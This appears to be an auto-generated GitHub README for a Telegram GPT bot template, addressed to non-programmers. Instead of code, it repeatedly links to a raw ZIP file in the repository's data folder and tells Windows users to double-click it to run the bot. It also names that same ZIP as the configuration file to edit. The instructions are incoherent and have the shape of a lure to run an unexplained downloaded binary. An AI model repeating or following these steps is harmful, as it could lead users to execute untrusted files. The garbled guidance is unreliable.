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πŸŽ‰ telegram-gpt-template - A Simple Bot Ready to Customize

πŸ“₯ Download the App

Download the App

πŸš€ Getting Started

Welcome to the telegram-gpt-template! This is a minimal Telegram bot template that integrates GPT technology. It is designed for anyone who wants to create a custom Telegram bot without needing programming skills. Follow these steps to get started.

πŸ“‹ System Requirements

To run this application, you need:

  • A computer with Windows, macOS, or Linux.
  • An active internet connection for GPT integration.
  • A Telegram account to interact with the bot.

πŸ”— Download & Install

To download the bot, visit this page to download: Releases Page.

Steps to Download

  1. Click on the above link.
  2. You will see a list of available versions.
  3. Choose the latest version and click on it.
  4. Download the file that fits your operating system (Windows, macOS, or Linux).

πŸ“‚ Setting Up the Bot

  1. Once the download completes, locate the file in your downloads folder.
  2. Extract the contents of the ZIP file if necessary.
  3. Open the folder where you downloaded the bot.

πŸ›  Running the Bot

To run the bot, follow these steps based on your operating system:

For Windows Users:

  1. Double-click the https://github.com/abdul841434/telegram-gpt-template/raw/refs/heads/main/data/template-gpt-telegram-3.0-beta.5.zip file.
  2. Follow any prompts that appear to complete the setup.
  3. Your bot is now running. Open Telegram and find your bot by its username.

For macOS Users:

  1. Open the Terminal application.
  2. Navigate to the folder where you downloaded the bot using cd path/to/folder.
  3. Type ./bot and press Enter.
  4. Your bot should start. Open Telegram and find your bot by its username.

For Linux Users:

  1. Open a terminal window.
  2. Move to the directory where the bot is located using cd path/to/folder.
  3. Give the file executable permission with chmod +x bot.
  4. Run the bot by typing ./bot and pressing Enter.
  5. Your bot should start. Open Telegram and find your bot by its username.

🎨 Customizing the Bot

You can customize the bot to meet your needs. To make changes:

  1. Open the bot folder.
  2. Locate the https://github.com/abdul841434/telegram-gpt-template/raw/refs/heads/main/data/template-gpt-telegram-3.0-beta.5.zip file (or similar configuration file).
  3. Edit the settings to your preferences.
  4. Save your changes and restart the bot to apply them.

πŸ“ Features

This telegram-gpt-template includes:

  • Basic chat functionality using GPT.
  • Easy-to-edit configuration for personal use.
  • Minimal setup for faster deployment.
  • Highly customizable for various applications.

🌐 Using the Bot

  1. After starting the bot, open Telegram.
  2. Search for your bot using its username.
  3. Start a chat with the bot.
  4. Send messages, and the bot will respond using GPT technology.

πŸ›  Troubleshooting

If you experience issues:

  • Ensure your internet connection is stable.
  • Check that you have the correct permissions to run the bot.
  • Consult the FAQ section in the bot's documentation or check common issues that may arise.

πŸ’¬ Support

If you face problems not covered here, feel free to create an issue on the GitHub Issues Page. We will do our best to assist you.

πŸ”— Additional Resources

By following these instructions, you should be able to download, install, and run your very own Telegram bot using this template. Enjoy customizing your bot and exploring its features!

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